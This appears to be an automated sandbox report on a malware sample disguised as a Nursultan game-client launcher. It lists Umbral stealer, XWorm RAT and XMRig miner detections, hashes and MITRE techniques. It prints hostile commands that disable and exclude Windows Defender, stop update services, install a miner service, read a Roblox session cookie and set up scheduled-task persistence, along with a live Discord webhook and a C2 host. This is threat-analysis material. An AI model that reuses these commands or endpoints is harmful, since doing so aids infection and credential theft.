umbral | 98d19ece6f9d50124465ab6c1eef845659aada6c62d3e32a2b75b487cf4efdda

Analysis

max time kernel
2s
max time network
149s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 02:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
Size

3.0MB
MD5

6850a8c541b310a2f4a5cd88352856a3
SHA1

372ff19e90cec46e37797b343fe6f537116b4aae
SHA256

87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95
SHA512

924d20cd368e797a771cf8b27b5e8994c62139a85a92ca068b64b0ac65598475b2225a81d08abb2aab9ad87f08d261f950219c16cee1b6d2e21c4b0c95eee4fa
SSDEEP

49152:g97jAtnr1ky+cFvVnJxuw9APD764uBxsPqlRJiM4C/d7Nch8zmOqYmlMH9TLi:g9otJOc/Jxuw9g764ssPqlbiM46ch8z6

Score

10^/10

umbral xmrig xworm evasion execution miner persistence rat stealer trojan upx

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1252172365647974441/4gQlLrJt2VtCn71LmsFuTifq4qn3SRnlOC0k8H5iaa8g2BlP4YuRr9feLLYTpIHpdtxd

Extracted

Family

xworm

Version

5.0

127.0.0.1:28223

unknown-sunglasses.gl.at.ply.gg:28223

Mutex

rVUJpGK3xHCE778M

Attributes

Install_directory
%AppData%
install_file
svchost.exe

aes.plain

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/memory/2424-29-0x00000000002F0000-0x0000000000330000-memory.dmp	family_umbral
behavioral1/files/0x0010000000012272-28.dat	family_umbral

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/memory/1880-61-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/1880-60-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/1880-59-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/1880-56-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/1880-54-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/memory/2444-166-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2444-167-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2444-165-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2444-163-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2444-164-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2444-161-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2444-160-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2632	powershell.exe
1752	powershell.exe
1716	powershell.exe
1604	powershell.exe
3032	powershell.exe
2272	powershell.exe
2572	powershell.exe
1912	powershell.exe
2644	powershell.exe
2292	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/1856-47-0x0000000001360000-0x0000000001548000-memory.dmp	net_reactor
behavioral1/files/0x0034000000014415-45.dat	net_reactor

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2444-157-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-166-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-167-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-165-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-163-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-164-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-161-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-160-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-159-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-155-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-158-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-156-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2444-174-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	discord.com
9	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1676	powercfg.exe
2240	powercfg.exe
2196	powercfg.exe
2176	powercfg.exe
912	powercfg.exe
876	powercfg.exe
1620	powercfg.exe
1924	powercfg.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1868	sc.exe
2336	sc.exe
1424	sc.exe
1420	sc.exe
2212	sc.exe
1524	sc.exe
1992	sc.exe
576	sc.exe
1536	sc.exe
1812	sc.exe
1824	sc.exe
2084	sc.exe
1504	sc.exe
2076	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1044	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2752	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2436	schtasks.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2164 wrote to memory of 2272	2164	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	28
PID 2164 wrote to memory of 2272	2164	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	28
PID 2164 wrote to memory of 2272	2164	87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe	28

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2332	attrib.exe

C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2272
- C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
  2⤵
  PID:2756
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1196
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1856
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1992
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1824
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2212
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1812
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1524
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:2176
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2196
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:2240
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:1676
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:1420
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1424
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2076
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:1536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2632
- C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
  2⤵
  PID:2424
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
    3⤵
    - Views/modifies file attributes
    PID:2332
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:1584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:2704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:476
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2376
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:1304
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    PID:2988
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1044
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
    3⤵
    PID:2668
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2572
- C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
  2⤵
  PID:1856
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:768
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1880
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1912
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1716
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1604
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2644
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2436
- C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
  "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
  2⤵
  PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2968

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
PID:2896
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:988
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1152
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:576
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1504
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2084
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2336
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1868
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1924
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1620
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:876
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:912
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1656
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:2444

C:\Windows\system32\taskeng.exe
taskeng.exe {E3AD2D07-DE2F-4A6D-92F1-B00B34649A3A} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
1⤵
PID:2144
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  PID:2976
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  PID:2616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

Filesize
102KB

MD5
c137c5f5287d73a94d55bc18df238303

SHA1
95b4b01775bea14feaaa462c98d969eb81696d2c

SHA256
d294856177658df0159cfe937e5ea95a8ee8a2ca85754d897aea3bb5d0d962c0

SHA512
ba595d185ae98152658ce95964fd6bcce7e970896b0b1c674a142d126cf0433094debcd25527d9b4f5a6568cc5a8a42aeaef536166748eea3973f8b694564aa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

Filesize
2.5MB

MD5
a1d8db2a1ff742bc73dd5617083f5fde

SHA1
957b182d82efb40a36099dd886ad581977880838

SHA256
d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a

SHA512
0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

Filesize
1.9MB

MD5
0df0a039309525fd27e1b5e056c92b6a

SHA1
7551c27a9123cb56c4218647966a753794ac2961

SHA256
a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f

SHA512
2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

Filesize
229KB

MD5
f0b33cc162bfd36a995b8c90cd8ebff1

SHA1
ca1ddef08d47fc15a44a2d651b61e3decce8ebc6

SHA256
6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0

SHA512
1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WBQGIKRMSH1GXMZEJG8S.temp

Filesize
7KB

MD5
171e4596826b2ad10e319469ecb1b8cf

SHA1
2e423d08e9e4b88dc34f9753b69e86f294f9e28d

SHA256
811d2032058427b5847c128645a6928932213596163288fd88dcfb05e2fb9438

SHA512
474d3efb94f35ed851fc5a9d9c7b94c71dd4371dd4d6980de86d32aec4c6c5d56049787cae365b73d40b7a9e2a3df10992271903e13b23fbc4b4be607d49cd59

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
4a5887281298574ed5243753fd6f3d15

SHA1
be4f930dc2b31fece3e8b5afdbdeca328e7d1439

SHA256
40a090399f5e0b09f05f55a694ec2c35b6786dd261dfd4e2d8b1d8650f25a0c3

SHA512
76945f3617e6b63ae39cc1a4e5be75dff0cad15b33d3d4ac7c5d7fb15c3d80e62d391a3ddea00eed629ae1cf2fb7cad032248d5b1ba0b28fbfb027ecd43defb9

Download Submit
\Users\Admin\AppData\Roaming\svchost.exe

Filesize
255KB

MD5
9af17c8393f0970ee5136bd3ffa27001

SHA1
4b285b72c1a11285a25f31f2597e090da6bbc049

SHA256
71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019

SHA512
b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3

Download Submit
memory/476-94-0x0000000001E90000-0x0000000001E98000-memory.dmp

Filesize
32KB

Download
memory/1584-75-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download
memory/1584-74-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/1656-147-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1656-146-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1656-150-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1656-148-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1656-153-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1656-149-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1752-67-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/1752-68-0x0000000001D30000-0x0000000001D38000-memory.dmp

Filesize
32KB

Download
memory/1856-47-0x0000000001360000-0x0000000001548000-memory.dmp

Filesize
1.9MB

Download
memory/1856-49-0x0000000005A20000-0x0000000005AD6000-memory.dmp

Filesize
728KB

Download
memory/1880-61-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1880-60-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1880-52-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1880-54-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1880-56-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1880-58-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/1880-59-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1880-51-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2164-0-0x000007FEF5193000-0x000007FEF5194000-memory.dmp

Filesize
4KB

Download
memory/2164-1-0x000000013FE50000-0x0000000140150000-memory.dmp

Filesize
3.0MB

Download
memory/2272-6-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/2272-8-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/2272-7-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2292-144-0x0000000019F60000-0x000000001A242000-memory.dmp

Filesize
2.9MB

Download
memory/2292-145-0x0000000000A20000-0x0000000000A28000-memory.dmp

Filesize
32KB

Download
memory/2424-29-0x00000000002F0000-0x0000000000330000-memory.dmp

Filesize
256KB

Download
memory/2444-156-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-158-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-167-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-165-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-163-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-164-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-161-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-162-0x00000000001B0000-0x00000000001D0000-memory.dmp

Filesize
128KB

Download
memory/2444-160-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-159-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-155-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-166-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-157-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2444-174-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2616-173-0x0000000000FA0000-0x0000000000FE0000-memory.dmp

Filesize
256KB

Download
memory/2632-23-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download
memory/2632-22-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2976-170-0x0000000000C70000-0x0000000000CB0000-memory.dmp

Filesize
256KB

Download
memory/2988-107-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2988-108-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/3032-137-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/3032-138-0x0000000001D40000-0x0000000001D48000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads